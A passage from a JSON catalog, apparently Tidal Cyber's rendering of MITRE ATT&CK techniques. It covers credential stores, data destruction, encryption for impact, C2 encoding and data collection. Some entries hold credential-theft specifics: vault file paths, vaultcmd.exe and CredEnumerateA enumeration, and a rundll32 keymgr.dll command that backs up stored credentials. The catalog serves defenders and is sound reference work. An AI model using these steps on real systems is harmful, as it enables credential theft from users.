"description": "An adversary may obtain root access (allowing them to read securityds memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the users logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup>\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apples keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup><sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup> Apples securityd utility takes the users logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the users password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.<sup>[[OS X Keychain](https://app.tidalcyber.com/references/bde3ff9c-fbf9-49c4-b414-70dc8356d57d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1555.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "fd75ec36-fc88-4bee-9fd9-480df6d1e765",
"value": "Securityd Memory"
},
{
"description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).<sup>[[Microsoft Credential Manager store](https://app.tidalcyber.com/references/c949a29b-bb31-4bd7-a967-ddd48c7efb8e)]</sup><sup>[[Microsoft Credential Locker](https://app.tidalcyber.com/references/77505354-bb08-464c-9176-d0015a62c7c9)]</sup>\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://app.tidalcyber.com/technique/b4a1cbaa-85d1-4a65-977f-494f66a141e3), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.<sup>[[passcape Windows Vault](https://app.tidalcyber.com/references/a8a56a64-8e73-4331-9961-b1f9b6cbb348)]</sup><sup>[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]</sup>\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.<sup>[[Microsoft CredEnumerate](https://app.tidalcyber.com/references/ec3e7b3f-99dd-4f2f-885b-09d66b01fe3e)]</sup><sup>[[Delpy Mimikatz Crendential Manager](https://app.tidalcyber.com/references/24c6027b-e0d2-4c0c-83af-4536a631ea85)]</sup>\n\nAdversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.\n\nPassword recovery tools may also obtain plain text passwords from the Credential Manager.<sup>[[Malwarebytes The Windows Vault](https://app.tidalcyber.com/references/f09fdc31-38ca-411d-8478-683b08a68535)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1555.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "9503955c-fa53-452a-b717-7e23bfb4df83",
"value": "Windows Credential Manager"
},
{
"description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "260571a6-3c08-5419-98c5-3fa1aa8e675d",
"type": "similar"
},
{
"dest-uuid": "b4a1cbaa-85d1-4a65-977f-494f66a141e3",
"type": "similar"
},
{
"dest-uuid": "1ef8a053-ff13-4a10-b9d9-0a017880e4a5",
"type": "similar"
},
{
"dest-uuid": "9448cf6f-7ba3-41d1-8710-8e6f9b0572ee",
"type": "similar"
},
{
"dest-uuid": "fd75ec36-fc88-4bee-9fd9-480df6d1e765",
"type": "similar"
},
{
"dest-uuid": "9503955c-fa53-452a-b717-7e23bfb4df83",
"type": "similar"
}
],
"uuid": "a0bb264e-8617-4ae6-bafd-f52b36c63d12",
"value": "Credentials from Password Stores"
},
{
"description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) and [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.<sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> In some cases politically oriented image files have been used to overwrite data.<sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>.\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.<sup>[[Data Destruction - Threat Post](https://app.tidalcyber.com/references/97d16d3a-98a0-4a7d-9f74-8877c8088ddf)]</sup><sup>[[DOJ - Cisco Insider](https://app.tidalcyber.com/references/b8d9006d-7466-49cf-a70e-384edee530ce)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "e5016c2b-85fe-4e6b-917d-0dd5b441cc34",
"value": "Data Destruction"
},
{
"description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1132.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "0848222e-ddc2-489e-8ea4-e19634f6af34",
"value": "Non-Standard Encoding"
},
{
"description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup><sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1132.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "972f0311-aec5-4fb5-bc5b-504c3f0cc95c",
"value": "Standard Encoding"
},
{
"description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "0848222e-ddc2-489e-8ea4-e19634f6af34",
"type": "similar"
},
{
"dest-uuid": "972f0311-aec5-4fb5-bc5b-504c3f0cc95c",
"type": "similar"
}
],
"uuid": "7d8af4f3-7d8e-4ef2-b828-40a910fc6188",
"value": "Data Encoding"
},
{
"description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.<sup>[[US-CERT Ransomware 2016](https://app.tidalcyber.com/references/866484fa-836d-4c5b-bbad-3594ef60599c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup>\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418), in order to unlock and/or gain access to manipulate these files.<sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup> In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.<sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> Encryption malware may also leverage [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup>\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.<sup>[[Rhino S3 Ransomware Part 1](https://app.tidalcyber.com/references/bb28711f-186d-4101-b153-6340ce826343)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "f0c36d24-263c-4811-8784-f716c77ec6b3",
"value": "Data Encrypted for Impact"
},
{
"description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://app.tidalcyber.com/technique/08a73f37-a04e-46be-9409-b330cbe291b4)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.<sup>[[Amazon S3 Security, 2019](https://app.tidalcyber.com/references/4c434ca5-2544-45e0-82d9-71343d8aa960)]</sup><sup>[[Microsoft Azure Storage Security, 2019](https://app.tidalcyber.com/references/95bda448-bb13-4fa6-b663-e48a9d1b866f)]</sup><sup>[[Google Cloud Storage Best Practices, 2019](https://app.tidalcyber.com/references/752ad355-0f10-4c8d-bad8-42bf2fc75fa0)]</sup> There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.<sup>[[Trend Micro S3 Exposed PII, 2017](https://app.tidalcyber.com/references/1ba37b48-1219-4f87-af36-9bdd8d6265ca)]</sup><sup>[[Wired Magecart S3 Buckets, 2019](https://app.tidalcyber.com/references/47fb06ed-b4ce-454c-9bbe-21b28309f351)]</sup><sup>[[HIPAA Journal S3 Breach, 2017](https://app.tidalcyber.com/references/b0fbf593-4aeb-4167-814b-ed3d4479ded0)]</sup><sup>[[Rclone-mega-extortion_05_2021](https://app.tidalcyber.com/references/9b492a2f-1326-4733-9c0e-a9454bf7fabb)]</sup>\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.",
"meta": {
"platforms": [
"Google Workspace",
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "77069b3f-9e42-4f1b-894f-8df568233df2",
"value": "Data from Cloud Storage"
},
{
"description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.<sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1602.002"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "0d5a5921-f643-4032-9a4a-0bb693822c21",
"value": "Network Device Configuration Dump"
},
{
"description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages<sup>[[SANS Information Security Reading Room Securing SNMP Securing SNMP](https://app.tidalcyber.com/references/616c9177-ca57-45f3-a613-d6450a94697d)]</sup>. The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1602.001"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "8510638d-5be4-4986-a11c-dcbdc729a50f",
"value": "SNMP (MIB Dump)"
},
{
"description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[US-CERT TA17-156A SNMP Abuse 2017](https://app.tidalcyber.com/references/82b814f3-2853-48a9-93ff-701d16d97535)]</sup>",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "0d5a5921-f643-4032-9a4a-0bb693822c21",
"type": "similar"
},
{
"dest-uuid": "8510638d-5be4-4986-a11c-dcbdc729a50f",
"type": "similar"
}
],
"uuid": "97ef6135-47d4-4b91-8783-c0b5f331340e",
"value": "Data from Configuration Repository"
},
{
"description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c), while credentials may provide access to additional resources using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[Wired Uber Breach](https://app.tidalcyber.com/references/3bdf88b3-8f41-4945-9292-e299bab4f98e)]</sup><sup>[[Krebs Adobe](https://app.tidalcyber.com/references/bc2b0b89-e00d-4beb-bf27-fe81d8c826a4)]</sup>\n\n**Note:** This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/2e4201da-fe83-439d-9d40-87e4c1f832fb), which focuses on conducting [Reconnaissance](https://app.tidalcyber.com/tactics/2706dc98-724b-4cf0-84b6-56cc20b0698e) via public code repositories.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1213.003"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "fe595943-f264-4d05-a8c7-7afc8985bfc3",
"value": "Code Repositories - Duplicate"
},
{
"description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1213.001"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "3cc64d61-7922-4e08-98ff-b76cb2173830",
"value": "Confluence"
},
{
"description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1213.002"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "8ac6952d-5add-4cbc-ad39-44943ed3459b",
"value": "Sharepoint"
},
{
"description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) and [Confluence](https://app.tidalcyber.com/technique/3cc64d61-7922-4e08-98ff-b76cb2173830), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.",
"meta": {
"platforms": [
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "fe595943-f264-4d05-a8c7-7afc8985bfc3",
"type": "similar"
},
{
"dest-uuid": "3cc64d61-7922-4e08-98ff-b76cb2173830",
"type": "similar"
},
{
"dest-uuid": "8ac6952d-5add-4cbc-ad39-44943ed3459b",
"type": "similar"
}
],
"uuid": "08a73f37-a04e-46be-9409-b330cbe291b4",
"value": "Data from Information Repositories"
},
{
"description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), such as [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) as well as a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907), which have functionality to interact with the file system to gather information.<sup>[[show_run_config_cmd_cisco](https://app.tidalcyber.com/references/5a68a45a-a53e-5d73-a82a-0cc951071aef)]</sup> Adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on the local system.\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "c0e4f97b-f651-493f-9636-6ac2f6fb46fb",
"value": "Data from Local System"
},
{
"description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "875c5aa3-6ab1-4717-9503-9818ccbad98a",
"value": "Data from Network Shared Drive"
},
{
"description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on removable media.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766",
"value": "Data from Removable Media"
},
{
"description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16) and [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1565.003"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "3ec6bb34-4134-40c3-8b67-c0aeceae4471",
"value": "Runtime Data Manipulation"
},
{
